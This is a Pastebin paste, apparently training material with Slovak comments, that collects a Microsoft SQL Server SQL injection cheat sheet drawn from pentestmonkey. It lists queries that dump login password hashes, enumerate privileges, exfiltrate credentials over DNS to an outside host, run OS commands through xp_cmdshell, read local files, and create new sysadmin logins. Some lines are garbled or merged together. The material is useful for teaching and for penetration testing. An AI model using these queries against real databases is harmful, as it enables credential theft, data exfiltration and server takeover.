SHARE
TWEET

Microsoft SQL Server SQL Injection Cheatsheet

IT-Academy Nov 24th, 2019 283 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. -- 01. Otvor a prejdi si zoznam skriptov
  2. -- https://pastebin.com/gXz34tXk
  3. -- http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
  4.  
  5. -- Verzia  
  6. SELECT @@version
  7.  
  8. -- Komentáre  
  9. SELECT 1 -- Komentár
  10. SELECT /* Komentár */ 1
  11.  
  12. -- Aktuálny používateľ
  13. SELECT user_name();
  14. SELECT system_user;
  15. SELECT user;
  16. SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID;
  17.  
  18. -- Vypísanie procesu konkrétneho používateľa
  19. EXEC sp_who [ [ @loginame = ] 'login' | session ID | 'ACTIVE' ];
  20.  
  21. -- Zobrazenie všetkých aktívnych procesov
  22. EXEC sp_who 'active';
  23.  
  24. -- Vypísanie procesu konkrétneho používateľa
  25. EXEC sp_who 'MSI_MR_FIRMA\IT Academy';
  26.  
  27. -- Zobrazenie konkrétneho procesu identifikovaného pomocou ID relácie
  28. EXEC sp_who '10' -- špecifikuje process_id;
  29.  
  30. -- Zoznam používateľov  
  31. SELECT name FROM master..syslogins
  32.  
  33. -- Zoznam DB
  34. SELECT name, database_id, create_date FROM sys.databases;
  35. SELECT name FROM master.sys.databases;
  36. SELECT name FROM master.dbo.sysdatabases;
  37. -- To exclude system databases:
  38. -- WHERE name NOT IN ('master', 'tempdb', 'model', 'msdb');
  39.  
  40. -- SELECT [name]
  41. -- FROM master.dbo.sysdatabases
  42. -- WHERE database_id > 6
  43.  
  44. SELECT name, database_id, create_date
  45. FROM sys.databases
  46. WHERE name NOT IN ('master', 'tempdb', 'model', 'msdb')
  47. and database_id > 7;
  48.  
  49. EXEC sp_databases;
  50.  
  51. -- show databases;
  52. --USE AdventureWorks2017;  
  53. --GO  
  54. --SELECT name, database_id, create_date  
  55. --FROM sys.databases ;  
  56. --GO
  57.  
  58. -- Zoznam hash hesiel
  59. SELECT name, password FROM master..syslogins -- priv, mssql 2000;
  60. SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..syslogins -- priv, mssql 2000.  Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.
  61. SELECT name, password_hash FROM master.sys.sql_logins -- priv, mssql 2005;
  62. SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins -- priv, mssql 2005
  63.  
  64. -- Password Cracker
  65. MSSQL 2000 and 2005 Hashes are both SHA1-based.  phrasen|drescher can crack these.
  66.  
  67. -- List Privileges  – current privs on a particular object in 2005, 2008
  68. -- current database
  69. SELECT permission_name FROM master..fn_my_permissions(null, 'DATABASE');
  70. -- current server
  71. SELECT permission_name FROM master..fn_my_permissions(null, 'SERVER');
  72. -- permissions on a table
  73. SELECT permission_name FROM master..fn_my_permissions('master..syslogins', 'OBJECT');
  74. SELECT permission_name FROM master..fn_my_permissions('sa', 'USER');
  75.  
  76. -- Permissions on a user– current privs in 2005, 2008
  77. SELECT is_srvrolemember('sysadmin');
  78. SELECT is_srvrolemember('dbcreator');
  79. SELECT is_srvrolemember('bulkadmin');
  80. SELECT is_srvrolemember('diskadmin');
  81. SELECT is_srvrolemember('processadmin');
  82. SELECT is_srvrolemember('serveradmin');
  83. SELECT is_srvrolemember('setupadmin');
  84. SELECT is_srvrolemember('securityadmin');
  85.  
  86. -- who has a particular priv? 2005, 2008
  87. SELECT name FROM master..syslogins WHERE denylogin = 0;
  88. SELECT name FROM master..syslogins WHERE hasaccess = 1;
  89. SELECT name FROM master..syslogins WHERE isntname = 0;
  90. SELECT name FROM master..syslogins WHERE isntgroup = 0;
  91. SELECT name FROM master..syslogins WHERE sysadmin = 1;
  92. SELECT name FROM master..syslogins WHERE securityadmin = 1;
  93. SELECT name FROM master..syslogins WHERE serveradmin = 1;
  94. SELECT name FROM master..syslogins WHERE setupadmin = 1;
  95. SELECT name FROM master..syslogins WHERE processadmin = 1;
  96. SELECT name FROM master..syslogins WHERE diskadmin = 1;
  97. SELECT name FROM master..syslogins WHERE dbcreator = 1;
  98. SELECT name FROM master..syslogins WHERE bulkadmin = 1;
  99.  
  100. -- List DBA Accounts   
  101. -- is your account a sysadmin?  returns 1 for true, 0 for false, NULL for invalid role.  Also try 'bulkadmin', 'systemadmin' and other values from the documentation
  102. SELECT is_srvrolemember('sysadmin');
  103. -- is sa a sysadmin? return 1 for true, 0 for false, NULL for invalid role/username.
  104. SELECT is_srvrolemember('sysadmin', 'sa');
  105. -- tested on 2005
  106. SELECT name FROM master..syslogins WHERE sysadmin = '1';
  107. -- Current Database
  108. SELECT DB_NAME();
  109.  
  110. -- List Databases  
  111. SELECT name FROM master..sysdatabases;
  112.  
  113. -- Za N = 0, 1, 2, …
  114. SELECT DB_NAME(N);
  115.  
  116. -- List Columns
  117. -- For the current DB only
  118. SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable');
  119. SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable';
  120.  
  121. -- list colum names and types for master..sometable
  122. List Tables SELECT name FROM master..sysobjects WHERE xtype = 'U'; -- use xtype = 'V' for views
  123. SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';
  124. SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable';
  125.  
  126. -- list colum names and types for master..sometable
  127. -- Find Tables From Column Name – NB: This example works only for the current database.  If you want to
  128. -- search another db, you need to specify the db name (e.g. replace sysobject with mydb..sysobjects).
  129. SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%PASSWORD%' — this lists table, column for each column containing the word 'password'
  130.  
  131. -- Select Nth Row  
  132. SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC
  133. -- gets 9th row
  134. -- Select Nth Char 
  135. SELECT substring('abcd', 3, 1) -- returns c
  136.  
  137. -- Bitwise AND 
  138. SELECT 6 & 2 -- returns 2
  139. SELECT 6 & 1 -- returns 0
  140. ASCII Value -> Char SELECT char(0×41) -- returns A
  141. Char -> ASCII Value SELECT ascii('A') -- returns 65
  142.  
  143. -- Casting 
  144. SELECT CAST('1' as int);
  145. SELECT CAST(1 as char)
  146.  
  147. -- String Concatenation
  148. SELECT 'A' + 'B' -- returns AB
  149.  
  150. -- If Statement
  151. IF (1=1) SELECT 1 ELSE SELECT 2 -- returns 1
  152.  
  153. -- Case Statement  
  154. SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END -- returns 1
  155.  
  156. -- Avoiding Quotes  SELECT char(65)+char(66) -- returns AB
  157. -- Time Delay    
  158. WAITFOR DELAY '0:0:5′ -- pause for 5 seconds
  159.  
  160. -- Make DNS Requests   
  161. declare @host varchar(800); select @host = name FROM master..syslogins; exec('master..xp_getfiledetails '\' + @host + 'c$boot.ini'); -- nonpriv, works on 2000declare @host varchar(800); select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.2.pentestmonkey.net' from sys.sql_logins; exec('xp_fileexist ”\' + @host + 'c$boot.ini”'); -- priv, works on 2005– NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host.  Messy but necessary.
  162. – Also check out theDNS tunnel feature of sqlninja
  163.  
  164. -- Command Execution   
  165. EXEC xp_cmdshell 'net user';
  166. -- privOn MSSQL 2005 you may need to reactivate xp_cmdshell first as it's disabled by default:
  167. EXEC sp_configure 'show advanced options', 1; -- priv
  168. RECONFIGURE; -- priv
  169. EXEC sp_configure 'xp_cmdshell', 1; -- priv
  170. RECONFIGURE; -- priv
  171.  
  172. -- Local File Access   
  173. CREATE TABLE mydata (line varchar(8000));
  174. BULK INSERT mydata FROM 'c:boot.ini';
  175. DROP TABLE mydata;
  176.  
  177. -- Hostname, IP Address
  178. SELECT HOST_NAME()
  179.  
  180. -- Create Users
  181. EXEC sp_addlogin 'user', 'pass'; -- priv
  182.  
  183. --Drop Users   
  184. EXEC sp_droplogin 'user'; -- priv
  185.  
  186. -- Make User DBA   
  187. EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin'; -- priv
  188.  
  189. -- Location of DB files
  190. EXEC sp_helpdb master; -- location of master.mdf
  191. EXEC sp_helpdb pubs; -- location of pubs.mdf
  192.  
  193. -- Default/System Databases northwind
  194. model
  195. msdb
  196. pubs -- not on sql server 2005
  197. tempdb
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top